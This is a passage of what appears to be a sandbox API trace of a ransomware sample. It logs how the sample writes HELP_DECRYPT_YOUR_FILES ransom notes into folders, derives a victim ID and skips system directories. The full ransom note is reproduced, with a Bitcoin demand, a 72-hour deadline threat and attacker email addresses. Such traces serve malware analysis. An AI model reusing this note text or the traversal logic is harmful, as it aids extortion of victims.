back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.766] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.770] CloseHandle (hObject=0x388) returned 1
	[0166.770] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.771] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0166.772] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.772] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.773] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.773] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.773] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0166.773] CloseHandle (hObject=0x388) returned 1
	[0166.774] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.774] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.774] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.774] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\HELP_DECRYPT_YOUR_FILES.HTML") returned 69
	[0166.774] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.775] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.775] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0166.778] CloseHandle (hObject=0x388) returned 1
	[0166.778] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.779] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.779] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0166.780] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.780] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.781] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.782] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.782] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0166.782] CloseHandle (hObject=0x388) returned 1
	[0166.783] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7cef3929, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.783] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*") returned 44
	[0166.783] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.783] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*", cchLength=0x2c | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*") returned 0x2c
	[0166.783] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.783] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="windows") returned 0x0
	[0166.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="boot") returned 0x0
	[0166.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="system volume information") returned 0x0
	[0166.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.784] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.784] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="temp") returned 0x0
	[0166.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="program files") returned 0x0
	[0166.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.785] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="appdata") returned 0x0
	[0166.785] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="application data") returned 0x0
	[0166.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="winnt") returned 0x0
	[0166.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.786] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="tmp") returned 0x0
	[0166.786] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="cache") returned 0x0
	[0166.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="webcache") returned 0x0
	[0166.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.787] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="inetcache") returned 0x0
	[0166.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.788] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="nvidia") returned 0x0
	[0166.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.788] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="packages") returned 0x0
	[0166.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.788] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="cookies") returned 0x0
	[0166.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.789] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\keys\\*.*", lpSrch="programdata") returned 0x0
	[0166.789] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.789] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.789] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7cef3929, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.789] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.789] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cef3929, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cef3929, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cf19c28, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.789] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cecdbf1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cecdbf1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cef3929, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.789] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cecdbf1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cecdbf1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cef3929, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0166.790] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.790] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.790] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PCPKSP", cAlternateFileName="")) returned 1
	[0166.790] lstrcmpW (lpString1="PCPKSP", lpString2="..") returned 1
	[0166.790] lstrcmpW (lpString1="PCPKSP", lpString2=".") returned 1
	[0166.791] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto"
	[0166.791] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\"
	[0166.791] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\", lpString2="PCPKSP" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP"
	[0166.791] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP"
	[0166.791] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\"
	[0166.791] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\"
	[0166.791] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*"
	[0166.791] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.799] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*") returned 46
	[0166.799] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.800] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*", cchLength=0x2e | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*") returned 0x2e
	[0166.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="windows") returned 0x0
	[0166.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="boot") returned 0x0
	[0166.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="system volume information") returned 0x0
	[0166.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="temp") returned 0x0
	[0166.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="program files") returned 0x0
	[0166.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.802] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.802] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="appdata") returned 0x0
	[0166.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.802] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="application data") returned 0x0
	[0166.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.802] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="winnt") returned 0x0
	[0166.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.803] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="tmp") returned 0x0
	[0166.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.803] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="cache") returned 0x0
	[0166.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.803] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.804] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="webcache") returned 0x0
	[0166.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.804] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="inetcache") returned 0x0
	[0166.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.804] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="nvidia") returned 0x0
	[0166.804] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.804] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="packages") returned 0x0
	[0166.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.805] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="cookies") returned 0x0
	[0166.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.805] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\*.*", lpSrch="programdata") returned 0x0
	[0166.805] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.805] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsAIK", cAlternateFileName="WINDOW~1")) returned 1
	[0166.805] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsAIK", cAlternateFileName="WINDOW~1")) returned 0
	[0166.805] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.810] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.811] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP"
	[0166.811] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\*.*"
	[0166.811] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.812] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.812] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\HELP_DECRYPT_YOUR_FILES.TXT") returned 70
	[0166.812] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.813] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.813] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.816] CloseHandle (hObject=0x388) returned 1
